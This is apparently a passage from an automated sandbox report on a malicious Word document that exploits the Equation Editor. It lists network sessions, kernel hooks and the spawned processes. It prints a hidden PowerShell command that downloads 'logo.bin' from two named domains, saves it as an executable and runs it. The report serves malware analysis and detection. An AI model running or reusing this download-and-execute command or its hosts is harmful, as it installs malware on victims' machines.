                Mai 25, 2018 16:05:03.131957054 MESZ74INData Raw: a1 72 32 d1 a1 72 f1 9f a1 72 9d 49 a2 72 06 03 a3 72 08 a0 a1 72 06 04 a3 72 f7 e0 a0 72 21 76 a2 72 ee 94 a3 72 99 82 a3 72 2f 70 a2 72 ea 62 a3 72 7d 41 a1 72 74 9b a0 72 9f 19 a2 72 96 95 a2 72 f6 97 a4 72 fd a0 94 72 c7 8d a4 72 39 c3 a1 72
                Data Ascii: r2rrIrrrrr!vrrr/prbr}Artrrrrrr9r(rrrrrr2vrGr}rrrX<rrrMrvrVrursrZrHr}ir]r!NrSr+r=rrVruBr:r7r:r:rJlrMrlrnrr5r
                Mai 25, 2018 16:05:03.131983042 MESZ76INData Raw: 80 10 40 00 ff 25 10 10 40 00 ff 25 50 10 40 00 ff 25 ac 11 40 00 ff 25 4c 10 40 00 ff 25 70 11 40 00 ff 25 f8 10 40 00 ff 25 a4 10 40 00 ff 25 9c 10 40 00 ff 25 f0 10 40 00 ff 25 68 10 40 00 ff 25 a4 11 40 00 ff 25 18 11 40 00 ff 25 74 11 40 00
                Data Ascii: @%@%P@%@%L@%p@%@%@%@%@%h@%@%@%t@%<@%@@%t@%@%$@%@%<@%@%@%@%@%$@%@%@%@%l@h@0p@H!E"%Respo
                Mai 25, 2018 16:05:03.132148981 MESZ76INData Raw: 98 00 00 ff 98 00 00 f8 c0 00 00 08 00 08 00 20 00 08 00 38 00 08 00 88 18 08 00 20 20 08 00 28 20 08 00 a0 20 08 00 a8 20 08 00 30 28 08 00 70 38 08 00 30 48 08 00 78 50 08 00 e8 58 08 00 30 60 08 00 40
                Data Ascii: 8 ( 0(p80HxPX0`@
                Mai 25, 2018 16:05:03.141367912 MESZ78INData Raw: 60 08 00 38 78 08 00 18 00 10 00 28 00 10 00 38 50 10 00 30 78 10 00 c8 80 10 00 38 88 10 00 40 88 10 00 d8 98 10 00 38 a0 10 00 ff c8 10 00 ff d8 10 00 20 20 18 00 38 68 18 00 30 80 18 00 30 98 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: `8x(8P0x8@8 8h00L\R:\]Y:
                Mai 25, 2018 16:05:03.141393900 MESZ79INData Raw: 00 00 00 00 00 00 00 38 88 10 00 2d 9c 00 00 1c 83 03 00 23 21 00 00 11 19 00 00 28 5c 00 a1 32 74 0c ff 22 2a 0f fa 03 00 a7 ff 00 00 74 d0 00 00 58 13 00 00 65 00 00 00 78 02 00 00 8f 00 00 08 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: 8-#!(\2t"*tXexb;2-e,c:%$+P(Xesu xn)#1
                Mai 25, 2018 16:05:03.141499043 MESZ80INData Raw: ba ff f7 61 b0 fc ff 6d ce ff fe 6b d0 f3 ff 18 19 63 ff e6 47 00 ff e9 50 00 fe e7 55 00 ff f1 6d 00 fc ee 7b 00 ff a6 3b 00 d4 db 7f 00 0f e5 95 00 00 ad 41 00 01 9e 44 00 00 80 38 00 00 00 00 00 00 00 00 00 00 08 18 a0 00 0c 30 d7 00 00 00 a6
                Data Ascii: amkcGPUm{;AD80A"I?bi`PR[OT5$3@8 jNec(K_ZEXlVB0556
                Mai 25, 2018 16:05:03.152396917 MESZ81INData Raw: 00 00 00 00 00 00 00 00 00 36 ad ff 00 00 00 37 00 1a 26 b4 01 10 42 c4 00 20 25 ca 11 64 00 12 07 1a 00 00 00 49 00 00 01 c0 74 40 00 c8 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff
                Data Ascii: 67&B %dIt@@??(( ,c-s@';?


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.1.164919387.247.241.14380C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampkBytes transferredDirectionData
                Mai 25, 2018 16:06:14.215694904 MESZ346OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:06:14.349939108 MESZ347INHTTP/1.1 302 Found
                Date: Fri, 25 May 2018 14:06:14 GMT
                Server: Apache
                Location: http://cypruscars4u.com/wordpress
                Content-Length: 217
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress">here</a>.</p></body></html>
                Mai 25, 2018 16:06:14.350713968 MESZ347OUTOPTIONS /wordpress HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:06:14.422110081 MESZ348INHTTP/1.1 301 Moved Permanently
                Date: Fri, 25 May 2018 14:06:14 GMT
                Server: Apache
                Location: http://cypruscars4u.com/wordpress/
                Content-Length: 242
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress/">here</a>.</p></body></html>
                Mai 25, 2018 16:06:14.422702074 MESZ348OUTOPTIONS /wordpress/ HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:06:14.493726969 MESZ348INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:06:14 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=98
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Mai 25, 2018 16:06:14.495145082 MESZ349OUTOPTIONS /wordpress/ HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:06:14.584757090 MESZ349INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:06:14 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=97
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Mai 25, 2018 16:06:14.586169004 MESZ349OUTOPTIONS /wordpress/ HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:06:14.662197113 MESZ350INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:06:14 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=96
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Mai 25, 2018 16:06:14.663610935 MESZ350OUTOPTIONS /wordpress/ HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: cypruscars4u.com
                Mai 25, 2018 16:06:14.741904974 MESZ351INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:06:14 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=95
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Mai 25, 2018 16:06:14.943006039 MESZ351INHTTP/1.1 403 Forbidden
                Date: Fri, 25 May 2018 14:06:14 GMT
                Server: Apache
                Content-Length: 338
                Keep-Alive: timeout=5, max=95
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.1.1649194216.239.34.2180C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                TimestampkBytes transferredDirectionData
                Mai 25, 2018 16:09:09.169472933 MESZ352OUTGET /ip HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                Host: ipinfo.io
                Mai 25, 2018 16:09:10.098851919 MESZ353INHTTP/1.1 200 OK
                Date: Fri, 25 May 2018 14:09:09 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 13
                X-Powered-By: Express
                x-cloud-trace-context: 15209dba1ea908a76ed41cc5af6d65d2/9651110695430674204;o=0
                Access-Control-Allow-Origin: *
                Set-Cookie: first_referrer=; Path=/
                Via: 1.1 google
                Expires: Fri, 25 May 2018 14:09:09 GMT
                Cache-Control: private
                Data Raw: 36 34 2e 31 31 33 2e 33 32 2e 32 39 0a
                Data Ascii: 64.113.32.29
                Mai 25, 2018 16:09:10.299015999 MESZ353INHTTP/1.1 200 OK
                Date: Fri, 25 May 2018 14:09:09 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 13
                X-Powered-By: Express
                x-cloud-trace-context: 15209dba1ea908a76ed41cc5af6d65d2/9651110695430674204;o=0
                Access-Control-Allow-Origin: *
                Set-Cookie: first_referrer=; Path=/
                Via: 1.1 google
                Expires: Fri, 25 May 2018 14:09:09 GMT
                Cache-Control: private
                Data Raw: 36 34 2e 31 31 33 2e 33 32 2e 32 39 0a
                Data Ascii: 64.113.32.29


                Code Manipulations

                IRP Handler

                Handler FunctionDriverAddressType
                IRP_MJ_SET_VOLUME_INFORMATION\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_QUERY_QUOTA\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_PNP\FileSystem\MRxDAV826FA00Enew
                IRP_MJ_CREATE_MAILSLOT\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_POWER\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_DEVICE_CONTROL\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_READ\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_DIRECTORY_CONTROL\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_QUERY_VOLUME_INFORMATION\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_SET_SECURITY\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_WRITE\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_LOCK_CONTROL\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_CLEANUP\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_CLOSE\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_INTERNAL_DEVICE_CONTROL\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_CREATE\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_CREATE_NAMED_PIPE\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_DEVICE_CHANGE\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_SET_INFORMATION\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_QUERY_EA\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_FILE_SYSTEM_CONTROL\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_FLUSH_BUFFERS\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_SET_EA\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_SYSTEM_CONTROL\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_QUERY_SECURITY\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_SET_QUOTA\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_QUERY_INFORMATION\FileSystem\MRxDAV81F451DEnew
                IRP_MJ_SHUTDOWN\FileSystem\MRxDAV81F451DEnew

                New Device

                DriverDeviceAttached to (upper)Attached to (lower)
                \FileSystem\MRxDAVunknownunknown

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:16:03:24
                Start date:25/05/2018
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\FORMP16T.docx
                Imagebase:0x2f2b0000
                File size:1423008 bytes
                MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:03:38
                Start date:25/05/2018
                Path:C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT
                Imagebase:0x2d2c0000
                File size:120160 bytes
                MD5 hash:92E7D4655C629754D2366E67E68A32F9
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:16:03:39
                Start date:25/05/2018
                Path:C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Imagebase:0x400000
                File size:543304 bytes
                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:16:03:39
                Start date:25/05/2018
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:CmD /C %tmp%\task.bat & UUUUUUUU c
                Imagebase:0x4a580000
                File size:302592 bytes
                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:03:41
                Start date:25/05/2018
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
                Imagebase:0x21ab0000
                File size:452608 bytes
                MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Start time:16:04:26
                Start date:25/05/2018
                Path:C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
                Wow64 process (32bit):false
                Commandline:'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
                Imagebase:0x400000
                File size:270387 bytes
                MD5 hash:A5EB363D44116B6CECB2AA7527FD7A6A
                Has administrator privileges:true
                Programmed in:Visual Basic
                Reputation:low

                General

                Start time:16:05:24
                Start date:25/05/2018
                Path:C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
                Wow64 process (32bit):false
                Commandline:'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'
                Imagebase:0x400000
                File size:270387 bytes
                MD5 hash:A5EB363D44116B6CECB2AA7527FD7A6A
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Start time:16:05:25
                Start date:25/05/2018
                Path:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Imagebase:0x400000
                File size:270387 bytes
                MD5 hash:A5EB363D44116B6CECB2AA7527FD7A6A
                Has administrator privileges:true
                Programmed in:Visual Basic
                Reputation:low

                General

                Start time:16:06:22
                Start date:25/05/2018
                Path:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Imagebase:0x400000
                File size:270387 bytes
                MD5 hash:A5EB363D44116B6CECB2AA7527FD7A6A
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Start time:16:07:00
                Start date:25/05/2018
                Path:C:\Windows\System32\taskeng.exe
                Wow64 process (32bit):false
                Commandline:taskeng.exe {4FF6B578-0DC8-43D6-96ED-9BD735AC3890} S-1-5-18:NT AUTHORITY\System:Service:
                Imagebase:0xda0000
                File size:192000 bytes
                MD5 hash:4F2659160AFCCA990305816946F69407
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:16:07:00
                Start date:25/05/2018
                Path:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Imagebase:0x400000
                File size:270387 bytes
                MD5 hash:A5EB363D44116B6CECB2AA7527FD7A6A
                Has administrator privileges:true
                Programmed in:Visual Basic
                Reputation:low

                General

                Start time:16:08:31
                Start date:25/05/2018
                Path:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                Imagebase:0x400000
                File size:270387 bytes
                MD5 hash:A5EB363D44116B6CECB2AA7527FD7A6A
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Start time:16:09:04
                Start date:25/05/2018
                Path:C:\Windows\System32\svchost.exe
                Wow64 process (32bit):false
                Commandline:svchost.exe
                Imagebase:0xee0000
                File size:20992 bytes
                MD5 hash:54A47F6B5E09A77E61649109C6A08866
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >

                  Execution Graph

                  Execution Coverage:8.4%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:31.2%
                  Total number of Nodes:64
                  Total number of Limit Nodes:1

                  Graph

